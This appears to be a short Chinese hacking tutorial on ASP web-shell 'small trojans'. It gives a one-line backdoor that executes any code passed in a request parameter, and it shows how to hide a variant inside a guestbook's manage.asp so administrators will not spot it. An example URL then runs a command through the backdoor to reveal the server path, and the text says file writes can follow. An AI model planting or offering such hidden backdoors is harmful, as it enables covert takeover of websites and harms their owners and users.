| 现在通过asp来按个小木马也算是“天经地义”的事了。不错,海阳的马功能多,量又足,实惠~~不过比较大的身型又容易遭明言的管理员发现。有必要另外在弄些即小又隐蔽的方法。。。
随着动网7.0的洞爆发,小木马这个概念产生了。
<%if request("a")<>"" then execute request("a")%>
------------------------------------
那把它合并到普通的ASP文件中,管理员们岂不是要傻掉?
我选了个文件做例子。
在一个guestbook的manage.asp中插了一段。原文
---------------------
<%
action=request("action")
id=request("id")
%>
.....省略登陆框等内容。
------------------------
修改后
<%if request("alte")="" then%>
<%action=request("action")%>
<%id=request("id")%>
<%else%>
<%execute request("alte")%>
<%end if%>
后面不动它.....
-------------
这样,提交 www.xxx.com/guestbook/manage.asp?alte=Response.Write server.mappath(Request.ServerVariables("SCRIPT_NAME"))
---------------------------
就出现了本文件绝对路径,写文件等语法也依次可跟上。 |
